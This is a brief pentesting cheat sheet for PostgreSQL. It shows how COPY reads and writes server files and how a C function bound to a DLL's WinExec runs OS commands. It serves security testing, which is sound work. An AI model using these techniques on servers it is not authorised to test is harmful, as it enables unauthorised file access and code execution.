PostgreSQL
This is a collection of various functionalities, snippets and attack vectors that can be used to test PostgreSQL database server for pentesters and red teamers.
Interacting with Filesystems:
COPY:
You can actually create a temporary table to read and write contents from the filesystem and drop the temporary table after.
Reading from a file:
COPY tableName from fileName;
Writing to a file:
COPY tableName to fileName;
Define a function with Custom DLL Extension for Code Execution:
CREATE OR REPLACE FUNCTION functionName(cstring) RETURNS int AS 'C:\Path\to\Extension.dll', 'WinExec' LANGUAGE C STRICT;
Then Execute the function as:
SELECT functionName(Argument);